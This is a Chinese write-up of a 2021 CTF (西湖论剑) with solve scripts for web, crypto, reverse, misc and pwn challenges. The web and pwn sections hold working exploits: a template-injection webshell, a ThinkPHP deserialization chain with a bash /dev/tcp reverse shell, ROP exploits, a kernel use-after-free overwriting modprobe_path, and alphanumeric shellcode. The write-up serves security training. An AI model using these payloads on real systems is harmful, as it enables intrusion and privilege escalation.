Contents
2021 西湖论剑 线上初赛 WP
web
web2
import requests
def test(payload):
url = "http://d4355a12-beba-42f3-ba5a-ca434c20da40.ezupload-ctf.dasctf.com:2333"
files = {'file': ("index.latte",payload)}
resp = requests.post(url, files=files
#,proxies = {"http": "127.0.0.1:8080"}
)
print(resp.text)
resp = requests.get(url)
print(resp.text)
payload = """{=system//
($_POST["cmd"])}"""
test(payload)
data = {
"cmd":"cat /flag"
}
url = "http://d4355a12-beba-42f3-ba5a-ca434c20da40.ezupload-ctf.dasctf.com:2333"
r = requests.post(url,data=data)
print(r.text)
web3
web4
用////绕过parse_url
<?php
namespace League\Flysystem\Cached\Storage {
abstract class AbstractCache {
protected $autosave = false;
protected $complete = "`bash -c 'exec bash -i &>/dev/tcp/ip/3333 <&1'`";
// protected $complete = "\"&whoami&" ;
// 在Windows环境中反引号无效,用&替代
}
}
namespace think\filesystem {
use League\Flysystem\Cached\Storage\AbstractCache;
class CacheStore extends AbstractCache {
protected $key = "1";
protected $store;
public function __construct($store="") {
$this->store = $store;
}
}
}
namespace think\cache {
abstract class Driver {
protected $options = ["serialize"=>["system"],"expire"=>1,"prefix"=>"1","hash_type"=>"sha256","cache_subdir"=>"1","path"=>"1"];
}
}
namespace think\cache\driver {
use think\cache\Driver;
class File extends Driver{}
}
namespace {
$file = new think\cache\driver\File();
$cache = new think\filesystem\CacheStore($file);
echo urlencode(serialize($cache));
}
?>
反弹shell即可
cry
hardrsa
from gmpy2 import *
from Crypto.Util.number import getPrime, long_to_bytes
import sympy
e = 0x10001
g = 2
y = 449703347709287328982446812318870158230369688625894307953604074502413258045265502496365998383562119915565080518077360839705004058211784369656486678307007348691991136610142919372779782779111507129101110674559235388392082113417306002050124215904803026894400155194275424834577942500150410440057660679460918645357376095613079720172148302097893734034788458122333816759162605888879531594217661921547293164281934920669935417080156833072528358511807757748554348615957977663784762124746554638152693469580761002437793837094101338408017407251986116589240523625340964025531357446706263871843489143068620501020284421781243879675292060268876353250854369189182926055204229002568224846436918153245720514450234433170717311083868591477186061896282790880850797471658321324127334704438430354844770131980049668516350774939625369909869906362174015628078258039638111064842324979997867746404806457329528690722757322373158670827203350590809390932986616805533168714686834174965211242863201076482127152571774960580915318022303418111346406295217571564155573765371519749325922145875128395909112254242027512400564855444101325427710643212690768272048881411988830011985059218048684311349415764441760364762942692722834850287985399559042457470942580456516395188637916303814055777357738894264037988945951468416861647204658893837753361851667573185920779272635885127149348845064478121843462789367112698673780005436144393573832498203659056909233757206537514290993810628872250841862059672570704733990716282248839
dp = 379476973158146550831004952747643994439940435656483772269013081580532539640189020020958796514224150837680366977747272291881285391919167077726836326564473
c = 57248258945927387673579467348106118747034381190703777861409527336272914559699490353325906672956273559867941402281438670652710909532261303394045079629146156340801932254839021574139943933451924062888426726353230757284582863993227592703323133265180414382062132580526658205716218046366247653881764658891315592607194355733209493239611216193118424602510964102026998674323685134796018596817393268106583737153516632969041693280725297929277751136040546830230533898514659714717213371619853137272515967067008805521051613107141555788516894223654851277785393355178114230929014037436770678131148140398384394716456450269539065009396311996040422853740049508500540281488171285233445744799680022307180452210793913614131646875949698079917313572873073033804639877699884489290120302696697425
c1 = 78100131461872285613426244322737502147219485108799130975202429638042859488136933783498210914335741940761656137516033926418975363734194661031678516857040723532055448695928820624094400481464950181126638456234669814982411270985650209245687765595483738876975572521276963149542659187680075917322308512163904423297381635532771690434016589132876171283596320435623376283425228536157726781524870348614983116408815088257609788517986810622505961538812889953185684256469540369809863103948326444090715161351198229163190130903661874631020304481842715086104243998808382859633753938512915886223513449238733721777977175430329717970940440862059204518224126792822912141479260791232312544748301412636222498841676742208390622353022668320809201312724936862167350709823581870722831329406359010293121019764160016316259432749291142448874259446854582307626758650151607770478334719317941727680935243820313144829826081955539778570565232935463201135110049861204432285060029237229518297291679114165265808862862827211193711159152992427133176177796045981572758903474465179346029811563765283254777813433339892058322013228964103304946743888213068397672540863260883314665492088793554775674610994639537263588276076992907735153702002001005383321442974097626786699895993544581572457476437853778794888945238622869401634353220344790419326516836146140706852577748364903349138246106379954647002557091131475669295997196484548199507335421499556985949139162639560622973283109342746186994609598854386966520638338999059
pd = 24869782389865450501811571588222344463610376331618976983194310327543361050399067805113576647152708173449058210620622984193023800730206452772983672334055867000
x = 43776275628859890575232443794319298551934804213472744927022818696759188901977390266973172755658396197421139420206549889337117978597883154859965236605452518446448639813055134133587564045471804447818058571586426895800984805588363855865218690877547419152765512143095217413477343835473963637692441032136163289964756172316289469159500312630529091350636808491697553069388388303341623047737553556123142002737059936569931163197364571478509576816349348146215101250803826590694039096063858424405382950769415272111843039715632655831594224288099608827345377164375927559338153505991404973888594356664393487249819589915881178770048740
p = 12131601165788024635030034921084070470053842112984866821070395281728468805072716002494427632757418621194662541766157553264889658892783635499016425528807741
print(long_to_bytes(pow(c,dp,p)))
数独
re
ROR
输入40个字节,然后加密后比较。
八个字节一组加密,直接z3或者angr都能出。。。。。
虚假的粉丝。
输入三个参数,一个是文件的序号,读取的起始位置和读取字节数。
然后11个字节,开头A结尾R,就脑洞猜key(无语) Alan Walker
最后猜出正确变体:Al4N_wAlK3R
解密得到字符画flag
misc
misc3_yusa的小秘密
bytectf原题,直接那之前的处理图片,处理后的图片上有flag。
from cv2 import cv2 as cv
img = cv.imread('ps')
src = cv.cvtColor(img, cv.COLOR_BGR2YCrCb)
Y, Cr, Cb = cv.split(src)
cv.imwrite('Y.png', (Y % 2) * 255)
cv.imwrite('Cr.png', (Cr % 2) * 255)
cv.imwrite('Cb.png', (Cb % 2) * 255)
misc5_Yusa的秘密
volatility分析 首先在桌面文件中发现了sakura相关的文件 同时发现用户名为yusa 于是以sakura和yusa为关键词dump可能有用的文件 最后找到了许多 其中关键的有mystery man.contact , yusa-didi ,key.zip
mystery man.contact中有一段base32,解码获得一段base64,再解码获得一个key,这个key用来解开yusa-didi这个压缩包,里面是一张key.bmp。然后根据题目给的原附件的who i am想到了用户密码 ,使用mimikatz插件获得YusaYusa520。然后根据yusa.contact中备忘录的提示dump下来stickynote进程 在其中发现了rtf模板保存下来获得key.zip的密码 key.zip解压后是一个脚本 读取key.bmp里的像素作为异或key加密flag 成了who i am 写一个解密脚本解密发现是张GIF图 最后分解GIF图在其中一帧上找到flag
pwn
pwn1_string_go
在lative_fuc中存在两个漏洞,第一个是输入的size可以是负数,导致可以直接向上溢出,从而泄漏canary和libc地址。其二是memcpy存在栈溢出,rop执行system(“/bin/sh”)
from pwn import *
# import pwnlib.asm as asm
context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
context.terminal = ['tmux', 'splitw', '-h']
local = 1
if local == 1:
p = process('./string_go')
lb = ELF('/lib/x86_64-linux-gnu/libc.so.6')
rdi, rsi, rdx, rax = 0, 0, 0, 0
syscall = 0
gadgets = []
else:
p = remote('82.157.20.104', 56700)
lb = ELF('libc-2.27.so')
rdi, rsi, rdx, rax = 0, 0, 0, 0
gadgets = []
syscall = 0
def new(off, x1, x2):
p.sendlineafter('>>> ', '3')
p.sendlineafter('>>> ', str(off))
p.sendlineafter('>>> ', x1)
p.sendlineafter('>>> ', x2)
new(-8, 'a'*0xf, '\xf0')
p.recvn(0x20)
libc_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
libc = libc_addr-0x98e200
p.recvn(18)
canary = u64(p.recvn(8))
print('canary = ', hex(canary))
print('libc:', hex(libc))
p.recvuntil('>>> ')
ret_addr = libc + 0xc0c9d
rdi = libc + 0x215bf
payload = 'a'*0x18 + p64(canary) + 'a'*0x18 + p64(ret_addr) + p64(rdi)
payload += p64(libc + lb.search('/bin/sh\x00').next()) + \
p64(libc + lb.sym['system'])
p.sendline(payload)
p.interactive()
pwn2_blind
这题是栈溢出,因为got表可写且没开pie,直接利用csu布置参数修改alarm低字节到syscall指令(需要爆破)。然后通过syscall执行exec(‘/bin/sh”,0,0’);
from signal import alarm
from pwn import *
# import pwnlib.asm as asm
context.log_level = 'debug'
context.arch = 'amd64'
context.os = 'linux'
context.terminal = ['tmux', 'splitw', '-h']
local = 0
elf = ELF("./blind")
if local == 1:
# p = process('./blind')
lb = ELF('/lib/x86_64-linux-gnu/libc.so.6')
rdi, rsi, rdx, rax = 0, 0, 0, 0
syscall = 0
gadgets = []
else:
p = remote('82.157.6.165', 51000)
# lb = ELF('libc.so')
rdi, rsi, rdx, rax = 0, 0, 0, 0
gadgets = []
syscall = 0
if local == 1:
p = gdb.debug('./blind', 'b *0x40074C')
exid = 0x3b
ap = 0x400560
ag = elf.got['alarm']
rg = elf.got['read']
bss = elf.bss()
def csu(func_got, arg0, arg1, arg2):
csu1 = 0x4007B6
csu2 = 0x4007A0
re = p64(csu1+4)+p64(0)+p64(1)+p64(func_got) + \
p64(arg0)+p64(arg1)+p64(arg2)+p64(csu2)
return re
pay = b'a'*0x58
pay += csu(rg, 1, ag, 0)
pay += p64(0)*7
pay += csu(rg, 0x100, bss, 0)
pay += p64(0)*7
pay += csu(ag, 0, 0, bss)
p.send(pay.ljust(0x500, b'\x01'))
# pause()
p.send(p8(0xd5))
# pause()
p.send(b'/bin/sh'.ljust(exid, b'\x00'))
# p.sendline('cat flag')
# ss=p.recv()
p.interactive()
pwn3_easykernel
show中存在溢出读,通过读写堆上的残留内容获得kernel地址绕过kalsr。其堆的释放没有清空指针,导致存在uaf,参考其保护机制
static inline void *freelist_ptr(const struct kmem_cache *s, void *ptr,
unsigned long ptr_addr)
{
#ifdef CONFIG_SLAB_FREELIST_HARDENED
/*
* When CONFIG_KASAN_SW_TAGS is enabled, ptr_addr might be tagged.
* Normally, this doesn't cause any issues, as both set_freepointer()
* and get_freepointer() are called with a pointer with the same tag.
* However, there are some issues with CONFIG_SLUB_DEBUG code. For
* example, when __free_slub() iterates over objects in a cache, it
* passes untagged pointers to check_object(). check_object() in turns
* calls get_freepointer() with an untagged pointer, which causes the
* freepointer to be restored incorrectly.
*/
return (void *)((unsigned long)ptr ^ s->random ^
swab((unsigned long)kasan_reset_tag((void *)ptr_addr)));
#else
return ptr;
#endif
}
修改fd指针,指向modprobe_path实现提权。
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/ioctl.h>
/*
* HEX: show number in hex
* LOG: show msg in specific format
* show: show n(size*8==0) bytes at addr with hex format
*/
#define HEX(x) printf("[*]0x%016lx\n", (size_t)x)
#define LOG(addr) printf("[*]%s\n", addr)
void show(u_int64_t *addr, int size)
{
int i;
puts("--------------------------------------------");
for (i = 0; i < size / 2; i++)
{
printf("0x%04lx ", (size_t)i * 0x10);
printf("0x%016lx 0x%016lx\n", (size_t)addr[2 * i], (size_t)addr[2 * i + 1]);
}
if (size & 1)
{
printf("0x%04lx ", (size_t)i * 0x10);
printf("0x%016lx 0x%016lx\n", (size_t)addr[size - 1], 0ul);
}
puts("--------------------------------------------");
}
int fd;
struct node
{
/* data */
u_int32_t idx;
u_int64_t size;
void *data;
};
void sw(int idx, size_t size, void *data)
{
struct node t =
{
idx,
size,
data};
ioctl(fd, 0x40, &t);
}
void edit(int idx, int size, void *data)
{
struct node t =
{
idx,
size,
data};
ioctl(fd, 0x50, &t);
}
void dlt(int idx)
{
struct node t = {idx, 0, 0};
ioctl(fd, 0x30, &t);
}
void new (int size, void *data)
{
struct node t = {0, size, data};
ioctl(fd, 0x20, &t.size);
}
#define __u64 u_int64_t
#define swab64(x) ((__u64)((((__u64)(x) & (__u64)0x00000000000000ffULL) << 56) | \
(((__u64)(x) & (__u64)0x000000000000ff00ULL) << 40) | \
(((__u64)(x) & (__u64)0x0000000000ff0000ULL) << 24) | \
(((__u64)(x) & (__u64)0x00000000ff000000ULL) << 8) | \
(((__u64)(x) & (__u64)0x000000ff00000000ULL) >> 8) | \
(((__u64)(x) & (__u64)0x0000ff0000000000ULL) >> 24) | \
(((__u64)(x) & (__u64)0x00ff000000000000ULL) >> 40) | \
(((__u64)(x) & (__u64)0xff00000000000000ULL) >> 56)))
int main(int argc, char const *argv[])
{
fd = open("/dev/kerpwn", O_RDWR);
if (fd == -1)
{
perror("[-]dev open:");
exit(-1);
}
LOG("open success!");
void *buf = malloc(0x10000);
memset(buf, 'A', 0x1000);
LOG("leak the kalsr");
new (0x10, buf);
memset(buf, 0, 0x200);
sw(0, 0x100, buf);
show(buf, (0x100) / 8);
size_t *p = buf;
size_t kbase = 0;
for (int i = 0; i < 0x10; i++)
{
if ((p[i] >> 32) == 0xffffffffLL)
{
kbase = p[i] - 0x10f1fa0;
break;
}
}
// size_t kbase=*(size_t *)(buf+0x40);
LOG("kernel base:");
HEX(kbase);
//use uaf to change modprobe path
LOG("change modprobe path!");
getchar();
size_t mp = kbase + 0x1663c00;
LOG("modprobe path");
HEX(mp);
int i, j;
uint64_t xored_cookie = 0, heap_addr[26], temp, secret;
char record[0x100];
for (i = 0; i < 25; i++)
add(0x10, "abcd"); //1-25
for (i = 1; i <= 25; i++)
dlt(i);
for (i = 1; i <= 25; i++)
{
sw(i, 0x100, buf);
for (j = 0; j < 0x100; j += 8)
{
if (((*(uint64_t *)&buf[j]) & 0xffff) == 0xb8af)
xored_cookie = *(uint64_t *)&buf[j];
}
}
if (xored_cookie)
printf("success:%llx\n", xored_cookie);
sw(2, 16, buf);
heap_addr[1] = (xored_cookie ^ *(uint64_t *)&buf[8]) | 0xffff000000000000;
printf("heap1 addr:0x%llx\n", heap_addr[1]);
temp = *(uint64_t *)&buf[8];
sw(3, 16, buf);
heap_addr[2] = (xored_cookie ^ *(uint64_t *)&buf[8]) | 0xffff000000000000;
printf("heap2 addr:0x%llx\n", heap_addr[2]);
secret = heap_addr[1] ^ swab64(heap_addr[2]) ^ temp;
printf("secret:0x%llx\n", secret);
sw(25, 16, buf);
heap_addr[24] = (xored_cookie ^ *(uint64_t *)&buf[8]) | 0xffff000000000000;
printf("heap24 addr:0x%llx\n", heap_addr[24]);
sw(24, 8, buf);
*(uint64_t *)&buf[8] = mp ^ swab64(heap_addr[24]) ^ secret;
printf("attempt:%llx\n", *(uint64_t *)&buf[8]);
edit(24, 16, buf);
add(0x10,"abcd");
add(0x10,"abcd");
add(0x10,"/tmp/c");
system("echo -ne '#!/bin/sh\n/bin/cp /flag /tmp/flag\n/bin/chmod 777 /tmp/flag' > /tmp/c");
system("chmod +x /tmp/c");
system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy");
system("chmod +x /tmp/dummy");
system("/tmp/dummy");
system("cat /tmp/flag");
return 0;
}
pwn4_code_project
程序开始将flag写入随机地址,并且开启沙箱经用常用的读写和命令执行的系统调用。但是并未为禁用writev系统调用仍然可以通过它进行系统调用,而且程序只允许用可见自负进行shellcode进行编码。这里直接利用alpha3工具进行编码。
'''
xor r7, r7
loop:
mov r4, r7
sal r4, 12
push 0x14
pop rax
push 1
pop rdi
push 1
pop rdx
push 0x30
push r4
mov rsi, rsp
syscall
inc r7
jmp loop
'''
from pwn import *
import inspect
from sys import argv
def leak(var):
callers_local_vars = inspect.currentframe().f_back.f_locals.items()
temp = [var_name for var_name, var_val in callers_local_vars if var_val is var][0]
p.info(temp + ': {:#x}'.format(var))
local_libc = '/lib/x86_64-linux-gnu/libc.so.6'
local_libc_32 = '/lib/i386-linux-gnu/libc.so.6'
remote_libc = ''
binary = './code_project'
context.binary = binary
elf = ELF(binary,checksec=False)
p = process(binary)
if len(argv) > 1:
if argv[1]=='r':
p = remote('82.157.31.181',42400)
libc = elf.libc
comm = ''
comm+= 'b *0x400b16\n'
shellcode =shellcraft.open("flag")
shellcode+= shellcraft.read(3,0x601240,0x30)
shellcode+= shellcraft.write(1,0x601240,0x30)
print(shellcode)
shellcode = b'Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M10108O1L4y3V16404j082s2G2n1k070k0Z05000Z180s2E0z8N3D0a042B8O403K4I2Z0Z'
p.sendlineafter(b'Hints: DASCTF{MD5}',shellcode)
p.interactive()